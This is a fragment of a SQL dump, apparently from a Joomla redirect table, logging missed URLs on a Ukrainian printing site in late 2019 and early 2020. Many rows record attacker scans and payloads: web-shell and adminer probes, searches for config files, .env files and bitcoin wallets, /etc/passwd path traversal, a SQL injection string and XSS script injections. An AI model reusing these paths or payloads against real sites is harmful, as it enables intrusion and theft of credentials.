00:00:00',301),(15749,'https://ekvatorprint.com.ua/api/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',9,0,'2019-12-01 17:12:06','0000-00-00 00:00:00',301),(15750,'https://ekvatorprint.com.ua/old/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2019-12-01 17:12:11','0000-00-00 00:00:00',301),(15751,'https://ekvatorprint.com.ua/wp-content/plugins/mm-plugin/inc/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2019-12-01 17:12:15','0000-00-00 00:00:00',301),(15752,'https://ekvatorprint.com.ua/templates/beez1/index.php',NULL,'','',1,0,'2019-12-02 13:57:56','0000-00-00 00:00:00',301),(15753,'https://ekvatorprint.com.ua/templates/beez1/error.php',NULL,'','',1,0,'2019-12-02 13:58:25','0000-00-00 00:00:00',301),(15754,'https://ekvatorprint.com.ua/templates/beez2/index.php',NULL,'','',1,0,'2019-12-02 13:58:53','0000-00-00 00:00:00',301),(15755,'https://ekvatorprint.com.ua/templates/beez2/error.php',NULL,'','',1,0,'2019-12-02 13:59:24','0000-00-00 00:00:00',301),(15756,'https://ekvatorprint.com.ua/templates/beez/error.php',NULL,'','',1,0,'2019-12-02 13:59:55','0000-00-00 00:00:00',301),(15757,'https://ekvatorprint.com.ua/templates/beez4/index.php',NULL,'','',1,0,'2019-12-02 14:00:31','0000-00-00 00:00:00',301),(15758,'https://ekvatorprint.com.ua/templates/beez4/error.php',NULL,'','',1,0,'2019-12-02 14:00:51','0000-00-00 00:00:00',301),(15759,'https://ekvatorprint.com.ua/news/',NULL,'','',8,0,'2019-12-02 19:59:00','0000-00-00 00:00:00',301),(15760,'https://ekvatorprint.com.ua/sftp-config.json',NULL,'','',8,0,'2019-12-02 23:41:14','0000-00-00 00:00:00',301),(15761,'https://ekvatorprint.com.ua/.ftpconfig',NULL,'','',8,0,'2019-12-02 23:41:15','0000-00-00 00:00:00',301),(15762,'https://ekvatorprint.com.ua/.remote-sync.json',NULL,'','',7,0,'2019-12-02 23:41:15','0000-00-00 00:00:00',301),(15763,'https://ekvatorprint.com.ua/.vscode/ftp-sync.json',NULL,'','',7,0,'2019-12-02 23:41:16','0000-00-00 00:00:00',301),(15764,'https://ekvatorprint.com.ua/.vscode/sftp.json',NULL,'','',8,0,'2019-12-02 23:41:16','0000-00-00 00:00:00',301),(15765,'https://ekvatorprint.com.ua/deployment-config.json',NULL,'','',7,0,'2019-12-02 23:41:17','0000-00-00 00:00:00',301),(15766,'https://ekvatorprint.com.ua/ftpsync.settings',NULL,'','',8,0,'2019-12-02 23:41:18','0000-00-00 00:00:00',301),(15767,'https://ekvatorprint.com.ua/s_noeval.php',NULL,'','',3,0,'2019-12-03 17:03:02','0000-00-00 00:00:00',301),(15768,'https://ekvatorprint.com.ua/wp-content/',NULL,'','',57,0,'2019-12-04 03:22:47','0000-00-00 00:00:00',301),(15769,'https://ekvatorprint.com.ua/s_eval.php',NULL,'','',3,0,'2019-12-04 21:31:33','0000-00-00 00:00:00',301),(15770,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/build.xml',NULL,'','',22,0,'2019-12-05 17:11:06','0000-00-00 00:00:00',301),(15771,'https://ekvatorprint.com.ua/assets/images/s_noeval.php',NULL,'','',6,0,'2019-12-06 01:34:17','0000-00-00 00:00:00',301),(15772,'https://ekvatorprint.com.ua/components/a.php',NULL,'','',1,0,'2019-12-07 07:45:43','0000-00-00 00:00:00',301),(15773,'https://ekvatorprint.com.ua/assets/images/s_eval.php',NULL,'','',6,0,'2019-12-07 07:52:38','0000-00-00 00:00:00',301),(15774,'https://ekvatorprint.com.ua/media/k2/assets/vendors/studio-42/elfinder/elfinder.html',NULL,'http://www.google.com/','',1,0,'2019-12-07 15:08:05','0000-00-00 00:00:00',301),(15775,'https://ekvatorprint.com.ua/yx7gidj1yrzf6jm9e3bsyrka9z',NULL,'','',1,0,'2019-12-07 22:07:46','0000-00-00 00:00:00',301),(15776,'https://ekvatorprint.com.ua/tmp/j.php',NULL,'','',1,0,'2019-12-08 15:29:03','0000-00-00 00:00:00',301),(15777,'https://ekvatorprint.com.ua/backup.dat',NULL,'','',3,0,'2019-12-09 01:26:07','0000-00-00 00:00:00',301),(15778,'https://ekvatorprint.com.ua/.bitcoin/bitcoin.dat',NULL,'','',2,0,'2019-12-09 01:26:09','0000-00-00 00:00:00',301),(15779,'https://ekvatorprint.com.ua/.bitcoin/backup.dat',NULL,'','',2,0,'2019-12-09 01:26:10','0000-00-00 00:00:00',301),(15780,'https://ekvatorprint.com.ua/backup/bitcoin.dat',NULL,'','',3,0,'2019-12-09 01:26:12','0000-00-00 00:00:00',301),(15781,'https://ekvatorprint.com.ua/backup/backup.dat',NULL,'','',2,0,'2019-12-09 01:26:14','0000-00-00 00:00:00',301),(15782,'https://ekvatorprint.com.ua/wp-content/themes/sketch/404.php',NULL,'','',7,0,'2019-12-09 02:18:26','0000-00-00 00:00:00',301),(15783,'https://ekvatorprint.com.ua/media/k2/assets/vendors/studio-42/elfinder/elfinder.php.html',NULL,'http://www.google.com/','',1,0,'2019-12-09 15:21:54','0000-00-00 00:00:00',301),(15784,'https://ekvatorprint.com.ua/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../com_fox.php',NULL,'','',1,0,'2019-12-09 17:32:27','0000-00-00 00:00:00',301),(15785,'https://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=1&cid=1&mid=1&qqfile=/../../com_fox.php',NULL,'','',1,0,'2019-12-09 17:32:29','0000-00-00 00:00:00',301),(15786,'https://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=1&cid=1&mid=1&owner=module&id=1&qqfile=/../../com_fox.php',NULL,'','',1,0,'2019-12-09 17:32:30','0000-00-00 00:00:00',301),(15787,'https://ekvatorprint.com.ua/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../com_fox.php',NULL,'','',1,0,'2019-12-09 17:32:31','0000-00-00 00:00:00',301),(15788,'https://ekvatorprint.com.ua/connectors/resource/seo_script.php',NULL,'','',4,0,'2019-12-09 19:51:30','0000-00-00 00:00:00',301),(15789,'https://ekvatorprint.com.ua/media/k2/assets/vendors/studio-42/elfinder/src/elfinder-src.php.html',NULL,'http://www.google.com/','',1,0,'2019-12-10 01:26:21','0000-00-00 00:00:00',301),(15790,'https://ekvatorprint.com.ua/st.php',NULL,'','',3,0,'2019-12-10 22:58:26','0000-00-00 00:00:00',301),(15791,'https://ekvatorprint.com.ua/printing-on-canvasбум',NULL,'','',1,0,'2019-12-10 23:36:17','0000-00-00 00:00:00',301),(15792,'https://ekvatorprint.com.ua/cache/s_noeval.php',NULL,'','',3,0,'2019-12-11 16:24:17','0000-00-00 00:00:00',301),(15793,'https://ekvatorprint.com.ua/index.php?option=com_easybookreloaded',NULL,'','',3,0,'2019-12-12 07:35:53','0000-00-00 00:00:00',301),(15794,'https://ekvatorprint.com.ua/index.php/gaestebuch/',NULL,'','',3,0,'2019-12-12 07:35:53','0000-00-00 00:00:00',301),(15795,'https://ekvatorprint.com.ua/gaestebuch',NULL,'','',3,0,'2019-12-12 07:35:54','0000-00-00 00:00:00',301),(15796,'https://ekvatorprint.com.ua/index.php?option=com_easygb',NULL,'','',3,0,'2019-12-12 07:35:54','0000-00-00 00:00:00',301),(15797,'https://ekvatorprint.com.ua/index.php?option=com_akobook',NULL,'','',3,0,'2019-12-12 07:35:54','0000-00-00 00:00:00',301),(15798,'https://ekvatorprint.com.ua/index.php?option=com_vitabook',NULL,'','',3,0,'2019-12-12 07:35:54','0000-00-00 00:00:00',301),(15799,'https://ekvatorprint.com.ua/index.php?option=com_jambook',NULL,'','',3,0,'2019-12-12 07:35:55','0000-00-00 00:00:00',301),(15800,'https://ekvatorprint.com.ua/component/jambook/',NULL,'','',3,0,'2019-12-12 07:35:55','0000-00-00 00:00:00',301),(15801,'https://ekvatorprint.com.ua/index.php/component/jambook/',NULL,'','',3,0,'2019-12-12 07:35:55','0000-00-00 00:00:00',301),(15802,'https://ekvatorprint.com.ua/guestbook/',NULL,'','',3,0,'2019-12-12 07:35:55','0000-00-00 00:00:00',301),(15803,'https://ekvatorprint.com.ua/index.php/guestbook/',NULL,'','',6,0,'2019-12-12 07:35:56','0000-00-00 00:00:00',301),(15804,'https://ekvatorprint.com.ua/index.php/gaestebuch',NULL,'','',3,0,'2019-12-12 07:35:56','0000-00-00 00:00:00',301),(15805,'https://ekvatorprint.com.ua/index.php?option=com_phocaguestbook&id=1',NULL,'','',2,0,'2019-12-12 07:35:56','0000-00-00 00:00:00',301),(15806,'https://ekvatorprint.com.ua/index.php?option=com_phocaguestbook',NULL,'','',3,0,'2019-12-12 07:35:57','0000-00-00 00:00:00',301),(15807,'http://ekvatorprint.com.ua/plugins/system/jsnframework/assets/3rd-party/jquery-file-upload/uploadfile.css',NULL,'http://www.google.com/','',1,0,'2019-12-13 01:57:45','0000-00-00 00:00:00',301),(15808,'https://ekvatorprint.com.ua/printing-on-canvasхлоя морнц',NULL,'','',1,0,'2019-12-13 14:00:40','0000-00-00 00:00:00',301),(15809,'https://ekvatorprint.com.ua/system/storage/logs/seo_script.php',NULL,'','',3,0,'2019-12-15 11:54:23','0000-00-00 00:00:00',301),(15810,'https://ekvatorprint.com.ua/mqvxipsve2wr1efb6wzmkn6f6qk',NULL,'','',1,0,'2019-12-15 13:27:57','0000-00-00 00:00:00',301),(15811,'https://ekvatorprint.com.ua/bitrix/admin/seo_script.php',NULL,'','',3,0,'2019-12-17 02:53:28','0000-00-00 00:00:00',301),(15812,'https://ekvatorprint.com.ua/versions.php',NULL,'','',3,0,'2019-12-17 15:03:25','0000-00-00 00:00:00',301),(15813,'https://ekvatorprint.com.ua/news/wp-admin/install.php',NULL,'','',1,0,'2019-12-17 20:34:10','0000-00-00 00:00:00',301),(15814,'https://ekvatorprint.com.ua/2018/wp-admin/install.php',NULL,'','',1,0,'2019-12-17 20:34:15','0000-00-00 00:00:00',301),(15815,'https://ekvatorprint.com.ua/wp1/wp-admin/install.php',NULL,'','',1,0,'2019-12-17 20:34:16','0000-00-00 00:00:00',301),(15816,'https://ekvatorprint.com.ua/shop/wp-admin/install.php',NULL,'','',1,0,'2019-12-17 20:34:18','0000-00-00 00:00:00',301),(15817,'https://ekvatorprint.com.ua/web/wp-admin/install.php',NULL,'','',5,0,'2019-12-17 20:34:22','0000-00-00 00:00:00',301),(15818,'https://ekvatorprint.com.ua/assets/plugins/plupload/examples/dump.php',NULL,'https://ekvatorprint.com.ua/assets/plugins/plupload/examples/dump.php','',2,0,'2019-12-18 03:15:44','0000-00-00 00:00:00',301),(15819,'http://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin/templates/gk_ilife/favicon.ico',NULL,'','',1,0,'2019-12-18 13:14:06','0000-00-00 00:00:00',301),(15820,'https://ekvatorprint.com.ua/system/logs/seo_script.php',NULL,'','',3,0,'2019-12-19 21:14:03','0000-00-00 00:00:00',301),(15821,'https://ekvatorprint.com.ua/cache/s_eval.php',NULL,'','',3,0,'2019-12-20 08:06:51','0000-00-00 00:00:00',301),(15822,'https://ekvatorprint.com.ua/?option=com_tag&controller=tag&tmpl=component&task=add',NULL,'','',1,0,'2019-12-20 10:59:58','0000-00-00 00:00:00',301),(15823,'https://ekvatorprint.com.ua/?option=com_myblog&tmpl=component',NULL,'','',1,0,'2019-12-20 10:59:59','0000-00-00 00:00:00',301),(15824,'https://ekvatorprint.com.ua/?option=com_seyret&tmpl=component',NULL,'','',1,0,'2019-12-20 11:00:00','0000-00-00 00:00:00',301),(15825,'https://ekvatorprint.com.ua/?option=com_facileforms&tmpl=component',NULL,'','',1,0,'2019-12-20 11:00:01','0000-00-00 00:00:00',301),(15826,'https://ekvatorprint.com.ua/?option=com_chronocontact&tmpl=component',NULL,'','',1,0,'2019-12-20 11:00:02','0000-00-00 00:00:00',301),(15827,'https://ekvatorprint.com.ua/contac',NULL,'','',1,0,'2019-12-23 09:07:22','0000-00-00 00:00:00',301),(15828,'https://ekvatorprint.com.ua/conta',NULL,'','',1,0,'2019-12-23 09:07:22','0000-00-00 00:00:00',301),(15829,'https://ekvatorprint.com.ua/cont',NULL,'','',1,0,'2019-12-23 09:07:23','0000-00-00 00:00:00',301),(15830,'https://ekvatorprint.com.ua/con',NULL,'','',1,0,'2019-12-23 09:07:23','0000-00-00 00:00:00',301),(15831,'https://ekvatorprint.com.ua/c',NULL,'','',1,0,'2019-12-23 09:07:23','0000-00-00 00:00:00',301),(15832,'https://ekvatorprint.com.ua/co',NULL,'','',1,0,'2019-12-23 09:07:24','0000-00-00 00:00:00',301),(15833,'https://ekvatorprint.com.ua/liunrrksgc6fwfyeh52sq',NULL,'','',1,0,'2019-12-24 04:22:32','0000-00-00 00:00:00',301),(15834,'https://ekvatorprint.com.ua/panel/tables.php',NULL,'http://ekvatorprint.com.ua/panel/tables.php','',1,0,'2019-12-25 10:22:21','0000-00-00 00:00:00',301),(15835,'https://ekvatorprint.com.ua/install.html',NULL,'','',3,0,'2019-12-25 13:13:31','0000-00-00 00:00:00',301),(15836,'https://ekvatorprint.com.ua/connectors/resource/s_eval.php',NULL,'','',6,0,'2019-12-25 15:09:47','0000-00-00 00:00:00',301),(15837,'https://ekvatorprint.com.ua/cache/seo_script.php',NULL,'','',3,0,'2019-12-26 19:36:37','0000-00-00 00:00:00',301),(15838,'https://ekvatorprint.com.ua/download.php?file=../../../../../../../../../../../../etc/passwd',NULL,'http://ekvatorprint.com.ua/download.php?file=../../../../../../../../../../../../etc/passwd','',1,0,'2019-12-27 12:18:21','0000-00-00 00:00:00',301),(15839,'https://ekvatorprint.com.ua/plupload/upload.php',NULL,'http://www.google.com/','',1,0,'2019-12-27 15:01:22','0000-00-00 00:00:00',301),(15840,'https://ekvatorprint.com.ua/download.php?f=../../../../../../../../../../../../etc/passwd',NULL,'http://ekvatorprint.com.ua/download.php?f=../../../../../../../../../../../../etc/passwd','',1,0,'2019-12-28 07:52:30','0000-00-00 00:00:00',301),(15841,'https://ekvatorprint.com.ua/xxx\') or 1 = 1 -- ]',NULL,'http://ekvatorprint.com.ua/xxx%27%29%20OR%201%20=%201%20--%20%5D','',1,0,'2019-12-28 20:52:40','0000-00-00 00:00:00',301),(15842,'https://ekvatorprint.com.ua/this.id',NULL,'http://ekvatorprint.com.ua/','',13,0,'2019-12-28 22:15:43','0000-00-00 00:00:00',301),(15843,'https://ekvatorprint.com.ua/wp-blog-config.php',NULL,'','',3,0,'2019-12-29 00:37:54','0000-00-00 00:00:00',301),(15844,'https://ekvatorprint.com.ua/admin/language/english/total/seo_script.php',NULL,'','',3,0,'2019-12-29 06:50:04','0000-00-00 00:00:00',301),(15845,'https://ekvatorprint.com.ua/ad.php',NULL,'','',2,0,'2019-12-29 10:17:21','0000-00-00 00:00:00',301),(15846,'https://ekvatorprint.com.ua/adm.php',NULL,'','',4,0,'2019-12-29 10:17:23','0000-00-00 00:00:00',301),(15847,'https://ekvatorprint.com.ua/connect.php',NULL,'','',1,0,'2019-12-29 10:17:25','0000-00-00 00:00:00',301),(15848,'https://ekvatorprint.com.ua/_adminer.php',NULL,'','',3,0,'2019-12-29 10:17:28','0000-00-00 00:00:00',301),(15849,'https://ekvatorprint.com.ua/pma.php',NULL,'','',2,0,'2019-12-29 10:17:29','0000-00-00 00:00:00',301),(15850,'https://ekvatorprint.com.ua/db.php',NULL,'','',4,0,'2019-12-29 10:17:31','0000-00-00 00:00:00',301),(15851,'https://ekvatorprint.com.ua/_adminer',NULL,'','',1,0,'2019-12-29 10:17:33','0000-00-00 00:00:00',301),(15852,'https://ekvatorprint.com.ua/adminer',NULL,'','',1,0,'2019-12-29 10:17:37','0000-00-00 00:00:00',301),(15853,'https://ekvatorprint.com.ua/mysql.php',NULL,'','',1,0,'2019-12-29 10:17:38','0000-00-00 00:00:00',301),(15854,'https://ekvatorprint.com.ua/adminer-4.2.4.php',NULL,'','',1,0,'2019-12-29 10:17:45','0000-00-00 00:00:00',301),(15855,'https://ekvatorprint.com.ua/adminer-4.1.0.php',NULL,'','',1,0,'2019-12-29 10:17:47','0000-00-00 00:00:00',301),(15856,'https://ekvatorprint.com.ua/adminer-4.2.5-mysql.php',NULL,'','',3,0,'2019-12-29 10:17:49','0000-00-00 00:00:00',301),(15857,'https://ekvatorprint.com.ua/adminer-4.6.2-mysql.php',NULL,'','',2,0,'2019-12-29 10:17:51','0000-00-00 00:00:00',301),(15858,'https://ekvatorprint.com.ua/adminer-4.3.1-mysql.php',NULL,'','',2,0,'2019-12-29 10:17:53','0000-00-00 00:00:00',301),(15859,'https://ekvatorprint.com.ua/adminer-4.2.4-mysql.php',NULL,'','',1,0,'2019-12-29 10:17:55','0000-00-00 00:00:00',301),(15860,'https://ekvatorprint.com.ua/adminer-4.1.0-mysql.php',NULL,'','',1,0,'2019-12-29 10:17:57','0000-00-00 00:00:00',301),(15861,'https://ekvatorprint.com.ua/unzipper.php',NULL,'','',1,0,'2019-12-29 10:17:59','0000-00-00 00:00:00',301),(15862,'https://ekvatorprint.com.ua/unzip.php',NULL,'','',1,0,'2019-12-29 10:18:01','0000-00-00 00:00:00',301),(15863,'https://ekvatorprint.com.ua/searchreplacedb2.php',NULL,'','',1,0,'2019-12-29 10:18:03','0000-00-00 00:00:00',301),(15864,'https://ekvatorprint.com.ua/replace.php',NULL,'','',1,0,'2019-12-29 10:18:04','0000-00-00 00:00:00',301),(15865,'https://ekvatorprint.com.ua/status?full=true',NULL,'http://ekvatorprint.com.ua/status?full=true','',1,0,'2019-12-29 12:13:35','0000-00-00 00:00:00',301),(15866,'https://ekvatorprint.com.ua/.idea/webservers.xml',NULL,'http://ekvatorprint.com.ua/.idea/WebServers.xml','',1,0,'2019-12-29 13:46:24','0000-00-00 00:00:00',301),(15867,'https://ekvatorprint.com.ua/config/database.yml',NULL,'http://ekvatorprint.com.ua/config/database.yml','',2,0,'2019-12-29 17:00:18','0000-00-00 00:00:00',301),(15868,'https://ekvatorprint.com.ua/store/app/etc/local.xml',NULL,'http://ekvatorprint.com.ua/store/app/etc/local.xml','',2,0,'2019-12-29 18:46:33','0000-00-00 00:00:00',301),(15869,'https://ekvatorprint.com.ua/dl.php?f=../../../../../../../../../../../../etc/passwd',NULL,'http://ekvatorprint.com.ua/dl.php?f=../../../../../../../../../../../../etc/passwd','',1,0,'2019-12-29 21:56:49','0000-00-00 00:00:00',301),(15870,'https://ekvatorprint.com.ua/plugins/content/apismtp/josmtpapi.php?test=hello',NULL,'http://www.google.com/','',15,0,'2019-12-30 02:53:36','0000-00-00 00:00:00',301),(15871,'https://ekvatorprint.com.ua/cache/search.php',NULL,'','',5,0,'2019-12-30 12:56:07','0000-00-00 00:00:00',301),(15872,'https://ekvatorprint.com.ua/script.php',NULL,'','',3,0,'2019-12-31 00:10:36','0000-00-00 00:00:00',301),(15873,'https://ekvatorprint.com.ua/h7orszhk5mqvpt6gm',NULL,'','',1,0,'2020-01-02 03:15:51','0000-00-00 00:00:00',301),(15874,'http://ekvatorprint.com.ua/wa-content/img/country/--.gif',NULL,'','',1,0,'2020-01-02 21:59:08','0000-00-00 00:00:00',301),(15875,'https://ekvatorprint.com.ua/beck/cron.php',NULL,'','',3,0,'2020-01-03 04:02:57','0000-00-00 00:00:00',301),(15876,'https://ekvatorprint.com.ua/meniacle/wp-blog-header.php',NULL,'','',3,0,'2020-01-05 20:07:25','0000-00-00 00:00:00',301),(15877,'https://ekvatorprint.com.ua/.bitcoin/',NULL,'http://ekvatorprint.com.ua/.bitcoin/','',1,0,'2020-01-05 21:28:09','0000-00-00 00:00:00',301),(15878,'https://ekvatorprint.com.ua/printing-on',NULL,'','',1,0,'2020-01-07 10:26:40','0000-00-00 00:00:00',301),(15879,'https://ekvatorprint.com.ua/libraries/joomla/template/content-post.php',NULL,'http://site.ru','',11,0,'2020-01-08 11:42:21','0000-00-00 00:00:00',301),(15880,'https://ekvatorprint.com.ua/cache/blackhat.php.suspected',NULL,'http://site.ru','',20,0,'2020-01-08 11:45:50','0000-00-00 00:00:00',301),(15881,'https://ekvatorprint.com.ua/components/com_contact/contact.lib.php',NULL,'http://site.ru','',5,0,'2020-01-08 12:36:13','0000-00-00 00:00:00',301),(15882,'https://ekvatorprint.com.ua/seter.php.suspected',NULL,'http://site.ru','',5,0,'2020-01-08 14:39:42','0000-00-00 00:00:00',301),(15883,'https://ekvatorprint.com.ua/network/popup-pomo.php',NULL,'http://site.ru','',7,0,'2020-01-08 15:34:09','0000-00-00 00:00:00',301),(15884,'https://ekvatorprint.com.ua/libraries/phputf8/str_parser.php',NULL,'http://site.ru','',7,0,'2020-01-08 15:40:08','0000-00-00 00:00:00',301),(15885,'https://ekvatorprint.com.ua/cache/content-post.php.suspected',NULL,'http://site.ru','',17,0,'2020-01-08 17:08:32','0000-00-00 00:00:00',301),(15886,'https://ekvatorprint.com.ua/feal.php.suspected',NULL,'http://site.ru','',4,0,'2020-01-08 20:16:38','0000-00-00 00:00:00',301),(15887,'https://ekvatorprint.com.ua/libraries/joomla/template/content-post.php.suspected',NULL,'http://site.ru','',6,0,'2020-01-08 22:09:43','0000-00-00 00:00:00',301),(15888,'https://ekvatorprint.com.ua/cache/wp-console.php.suspected',NULL,'http://site.ru','',6,0,'2020-01-08 23:23:30','0000-00-00 00:00:00',301),(15889,'https://ekvatorprint.com.ua/administrator/components/com_cache/views/purge/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-01-08 23:45:07','0000-00-00 00:00:00',301),(15890,'https://ekvatorprint.com.ua/libraries/joomla/template/wp-cofigs.php.suspected',NULL,'http://site.ru','',6,0,'2020-01-09 02:35:46','0000-00-00 00:00:00',301),(15891,'https://ekvatorprint.com.ua/components/com_search/models/popup-pomo.php',NULL,'http://site.ru','',5,0,'2020-01-09 05:55:28','0000-00-00 00:00:00',301),(15892,'https://ekvatorprint.com.ua/cache/simple.php5',NULL,'http://site.ru','',26,0,'2020-01-09 10:33:48','0000-00-00 00:00:00',301),(15893,'https://ekvatorprint.com.ua/ns.php.suspected',NULL,'http://site.ru','',4,0,'2020-01-09 14:26:17','0000-00-00 00:00:00',301),(15894,'https://ekvatorprint.com.ua/.env.dev.local',NULL,'http://ekvatorprint.com.ua/.env.dev.local','',3,0,'2020-01-09 15:08:58','0000-00-00 00:00:00',301),(15895,'https://ekvatorprint.com.ua/.env.development.local',NULL,'http://ekvatorprint.com.ua/.env.development.local','',3,0,'2020-01-09 15:09:01','0000-00-00 00:00:00',301),(15896,'https://ekvatorprint.com.ua/.env.prod.local',NULL,'http://ekvatorprint.com.ua/.env.prod.local','',3,0,'2020-01-09 15:09:02','0000-00-00 00:00:00',301),(15897,'https://ekvatorprint.com.ua/.env.production.local',NULL,'http://ekvatorprint.com.ua/.env.production.local','',3,0,'2020-01-09 15:09:04','0000-00-00 00:00:00',301),(15898,'https://ekvatorprint.com.ua/layouts/joomla/system/mark.php',NULL,'http://site.ru','',5,0,'2020-01-09 16:01:20','0000-00-00 00:00:00',301),(15899,'https://ekvatorprint.com.ua/foo\'\"><script src=/xss.mx></script><x=\"',NULL,'http://ekvatorprint.com.ua/foo%27%22%3E%3Cscript%20src=//xss.mx%3E%3C/script%3E%3Cx=%22','',1,0,'2020-01-09 16:43:29','0000-00-00 00:00:00',301),(15900,'https://ekvatorprint.com.ua/ns.php',NULL,'http://site.ru','',6,0,'2020-01-09 17:13:50','0000-00-00 00:00:00',301),(15901,'https://ekvatorprint.com.ua/cstzny0owb',NULL,'','',1,0,'2020-01-09 17:23:13','0000-00-00 00:00:00',301),(15902,'https://ekvatorprint.com.ua/1\'\"><iframe srcdoc=\'<script src=\"data:text/javascript,alert(/hello/)\"></script>\'></iframe>',NULL,'http://ekvatorprint.com.ua/1%27%22%3E%3Ciframe%20srcdoc=%27%3Cscript%20src=%22data:text/javascript,alert%28/hello/%29%22%3E%3C/script%3E%27%3E%3C/iframe%3E','',1,0,'2020-01-09 18:39:03','0000-00-00 00:00:00',301),(15903,'https://ekvatorprint.com.ua/models.php',NULL,'http://site.ru','',6,0,'2020-01-09 21:47:23','0000-00-00 00:00:00',301),(15904,'https://ekvatorprint.com.ua/libraries/joomla/template/mide.php',NULL,'http://site.ru','',18,0,'2020-01-09 22:22:42','0000-00-00 00:00:00',301),(15905,'https://ekvatorprint.com.ua/simple.php5',NULL,'http://site.ru','',13,0,'2020-01-09 23:05:44','0000-00-00 00:00:00',301),(15906,'https://ekvatorprint.com.ua/administrator/components/com_admin/postinstall/content-post.php',NULL,'http://site.ru','',2,0,'2020-01-10 10:06:59','0000-00-00 00:00:00',301),(15907,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/blackhat.php',NULL,'http://site.ru','',1,0,'2020-01-10 10:29:19','0000-00-00 00:00:00',301),(15908,'https://ekvatorprint.com.ua/libraries/joomla/base/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-10 12:32:03','0000-00-00 00:00:00',301),(15909,'https://ekvatorprint.com.ua/administrator/components/com_banners/views/banner/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-10 12:58:19','0000-00-00 00:00:00',301),(15910,'https://ekvatorprint.com.ua/assets/images/simple.php5',NULL,'http://site.ru','',2,0,'2020-01-10 13:22:41','0000-00-00 00:00:00',301),(15911,'https://ekvatorprint.com.ua/paypal/content-post.php',NULL,'http://site.ru','',2,0,'2020-01-10 13:23:58','0000-00-00 00:00:00',301),(15912,'https://ekvatorprint.com.ua/simple.php5.suspected',NULL,'http://site.ru','',12,0,'2020-01-10 14:09:17','0000-00-00 00:00:00',301),(15913,'https://ekvatorprint.com.ua/hello.php.suspected',NULL,'http://site.ru','',2,0,'2020-01-10 15:32:49','0000-00-00 00:00:00',301),(15914,'https://ekvatorprint.com.ua/widgets/content-post.php',NULL,'http://site.ru','',5,0,'2020-01-10 16:19:02','0000-00-00 00:00:00',301),(15915,'https://ekvatorprint.com.ua/language/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-10 17:56:49','0000-00-00 00:00:00',301),(15916,'https://ekvatorprint.com.ua/options/content-post.php',NULL,'http://site.ru','',7,0,'2020-01-10 19:34:43','0000-00-00 00:00:00',301),(15917,'https://ekvatorprint.com.ua/components/com_content/views/category/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-11 01:43:29','0000-00-00 00:00:00',301),(15918,'https://ekvatorprint.com.ua/images/content-post.php',NULL,'http://site.ru','',2,0,'2020-01-11 02:34:59','0000-00-00 00:00:00',301),(15919,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/simple.php5',NULL,'http://site.ru','',4,0,'2020-01-11 03:44:43','0000-00-00 00:00:00',301),(15920,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/content-post.php',NULL,'http://site.ru','',5,0,'2020-01-11 04:12:16','0000-00-00 00:00:00',301),(15921,'https://ekvatorprint.com.ua/components_nok/com_joomlaupdate/views/default/tmpl/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-01-11 07:01:53','0000-00-00 00:00:00',301),(15922,'https://ekvatorprint.com.ua/libraries/phpmailer/language/content-post.php.suspected',NULL,'http://site.ru','',2,0,'2020-01-11 07:52:55','0000-00-00 00:00:00',301),(15923,'https://ekvatorprint.com.ua/vpns/cfg/smb.conf',NULL,'https://ekvatorprint.com.ua/vpn/../vpns/cfg/smb.conf','',2,0,'2020-01-12 10:40:53','0000-00-00 00:00:00',301),(15924,'https://ekvatorprint.com.ua/kickstart.php',NULL,'https://ekvatorprint.com.ua/kickstart.php','',2,0,'2020-01-13 21:05:58','0000-00-00 00:00:00',301),(15925,'https://ekvatorprint.com.ua/pric',NULL,'','',1,0,'2020-01-14 08:55:51','0000-00-00 00:00:00',301),(15926,'https://ekvatorprint.com.ua/db1c34712d4ee7dfe8eac9adc3c0eedf',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2020-01-15 11:03:55','0000-00-00 00:00:00',301),(15927,'https://ekvatorprint.com.ua/js/kcfinder/browse.php',NULL,'','',1,0,'2020-01-16 03:18:38','0000-00-00 00:00:00',301),(15928,'https://ekvatorprint.com.ua/shoes.php',NULL,'http://site.ru','',6,0,'2020-01-16 11:24:36','0000-00-00 00:00:00',301),(15929,'https://ekvatorprint.com.ua/sim5.php',NULL,'http://site.ru','',3,0,'2020-01-16 12:14:09','0000-00-00 00:00:00',301),(15930,'https://ekvatorprint.com.ua/templates/streamed.php',NULL,'http://site.ru','',1,0,'2020-01-16 13:38:32','0000-00-00 00:00:00',301),(15931,'https://ekvatorprint.com.ua/cache/sim5.php',NULL,'http://site.ru','',3,0,'2020-01-16 14:18:17','0000-00-00 00:00:00',301),(15932,'https://ekvatorprint.com.ua/wool.php',NULL,'http://site.ru','',3,0,'2020-01-16 14:40:56','0000-00-00 00:00:00',301),(15933,'https://ekvatorprint.com.ua/cache/ghjk.php',NULL,'http://site.ru','',2,0,'2020-01-16 16:19:07','0000-00-00 00:00:00',301),(15934,'https://ekvatorprint.com.ua/wp-content/themes/twentynineteen/styles.php',NULL,'http://site.ru','',3,0,'2020-01-16 19:04:06','0000-00-00 00:00:00',301),(15935,'https://ekvatorprint.com.ua/images/up.php',NULL,'http://site.ru','',2,0,'2020-01-16 19:08:22','0000-00-00 00:00:00',301),(15936,'https://ekvatorprint.com.ua/modules/mod_carramba/shoes.php',NULL,'http://site.ru','',2,0,'2020-01-16 20:25:14','0000-00-00 00:00:00',301),(15937,'https://ekvatorprint.com.ua/wp-content/themes/twentynineteen/style.php.suspected',NULL,'http://site.ru','',7,0,'2020-01-16 23:47:54','0000-00-00 